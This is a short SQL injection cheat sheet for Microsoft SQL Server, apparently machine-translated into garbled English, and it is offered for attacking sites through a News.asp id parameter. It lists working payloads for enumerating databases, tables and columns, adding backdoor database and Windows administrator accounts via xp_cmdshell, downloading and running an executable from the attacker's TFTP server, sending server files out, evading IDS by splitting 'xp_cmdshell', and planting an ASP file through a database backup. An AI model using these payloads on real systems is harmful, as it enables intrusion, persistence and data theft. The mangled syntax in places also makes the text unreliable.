Preface:
That is, advanced techniques, other basic injection methods are not detailed.
I don't understand that I can check the injecting basic article.
For better injection, I suggest you look at the SQL grammar related articles on this site.
[Get all database name]
Select name from master.dbo.sysdatabases where dbid = 7 // DBID value is more than 7 or more is the user database
[Get Data Name] [Update the field value as a table name, then you can get the table name again]
SELECT TOP 1 Name from database name .dbo.sysObjects where xtype = 'u' and status> 0 and name not in ('table ")
[Get Data Table Field Name] [Update the field value as the field name, then you can get the value of the value of this field]
SELECT TOP 1 Database Name .dbo.col_name (Object_ID ('To query the data table name), field list,: 1) [Where condition]
Injecting the drain database administrator account and system administrator account via SQL Server [Current account must be sysadmin group]
News.asp? id = 2; exec master.dbo.sp_addlogin test, test; - // Add Database User User Test, Password Test
News.asp? id = 2; exec master.dbo.sp_password test, 123456, test; - // If you want to change your password, use this sentence (change Test's password to 123456)
News.asp? id = 2; exec master.dbo.sp_addsrvrolemember test, sysadmin; - // Add Test to the sysadmin group, member of this group can perform any operations
News.asp? id = 2; exec master.dbo.xp_cmdshell 'net user test test / add'; - // Add system user TEST, password is TEST
News.asp? id = 2; exec master.dbo.xp_cmdshell 'net localgroup administrators test / add'; - // Put the system user TEST to the administrator
This way, you have left Test administrators in his database and system.
Here's how to download file file.exe from your meager File.exe [Prerequisites you must set your computer to TFTP server, open 69 ports]
ID = 2; exec master.dbo.xp_cmdshell 'tftp -i Your IP get file.exe';
Then run this file:
ID = 2; exec master.dbo.xp_cmdshell 'file.exe'; -
Download the server file file2.doc to the local TFTP server [file must exist]:
ID = 2; exec master.dbo.xp_cmdshell 'tftp -i Your IP Put file2.doc';
Bypassing IDS detection [Use variables]
Declare @a sysname set @ a = 'xp _' 'cmdshell' exec @a 'DIR C: /'
Declare @a sysname set @ a = 'xp' '_ cm' 'dshell' exec @a 'DIR C: /'
Newly added:
Built a table. There is only one field, the type is image, written to the contents of the ASP. Export database as file
Backup Database DBName to Disk = 'D: /Web/db.asp'; error is available to get system operating system and database system version number
ID = 2 and 1 <> (Select @@ version);
